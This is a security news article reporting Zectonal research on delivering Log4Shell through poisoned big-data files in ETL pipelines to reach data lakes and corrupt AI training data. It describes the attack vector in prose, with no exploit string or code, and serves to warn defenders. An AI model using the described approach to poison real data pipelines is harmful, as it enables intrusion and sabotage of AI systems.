Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
Generally, organizations are focused on ingesting as many data points for training an AI or algorithm that they can, with an eye toward privacy — but all too often, they’re skipping over hardening the security of the data lakes themselves.
According to research from Zectonal, the Log4Shell bug can be triggered once it is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.
“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms.”
Leveraging RCE Exploits to Access Data Lakes
One of the ways to accomplish this attack is by targeting vulnerable versions of the no-code, open source extract-transform-load (ETL) software application — one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.
While ETL patched the RCE issue last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period,” according to the report, shared with Dark Reading prior to publication.
“This attack vector isn’t as simple as just kind of sending a text string to a Web server,” Hirko says, noting the need to penetrate the data supply chain. “An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string.”
This particular exploit and vulnerability has patches available, but there are likely many different avenues to achieving this kind of Log4Shell attack.
“There are probably many, many previously unknown or undisclosed vulnerabilities that allow the same thing,” Hirko says. “This is one of the first data poisoning-specific attack vectors that we’ve seen, but we believe that data poisoning as a subset of AI poisoning is going to be one of the new attack vectors of the future.”
So far, Zectonal hasn’t seen such attacks in the wild, but researchers hope the threat is on security teams’ radar screens. Such attacks may be rare, but they can have outsized consequences. For instance, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.
“Automakers are training their AI to look at stoplights, to know when to stop, slow down, or go in the classic red, yellow, green format,” Hirko explains. “If you were to start poisoning your data lake that was training your AI, it’s possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car unintentionally gets trained to go when the traffic light turns red and stop when it turns green. So, that’s the type of attack vector that we suspect we’ll be seeing in the future.”
Security Protections Lag
The risks are gaining a higher profile among practitioners, Hirko tells Dark Reading — many of whom understand the danger but are at a loss for how to tackle it. Among the challenges is the fact that approaching the problem requires a new way of implementing security, as well as new tools.
“We were able to send the poisoned payload through a pretty common data pipeline,” Hirko says. “Traditionally, these kinds of files and data pipelines don’t come through your standard front-door set of firewalls. How data comes into the enterprise, how data comes into the data lake, hasn’t really been part of the classic security posture of defense in depth or zero trust. If you’re using any of the major cloud providers, data that comes in from an object storage bucket won’t necessarily come through that firewall.”
He adds that the file formats that these types of attacks can be bundled into are relatively new and somewhat obscure — and because they’re specific to the big data and AI world, they’re not as easy to scan with typical security tools, which are made to scan documents or spreadsheets.
Thus, for their part, security vendors need to focus on the development of different types of products to gain that further visibility, he notes.
“Companies are looking at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerability of that data as well,” Hirko says. “We suspect that data observability will be built into quality assurance as well as data security. This is an emerging kind of data and AI security domain.”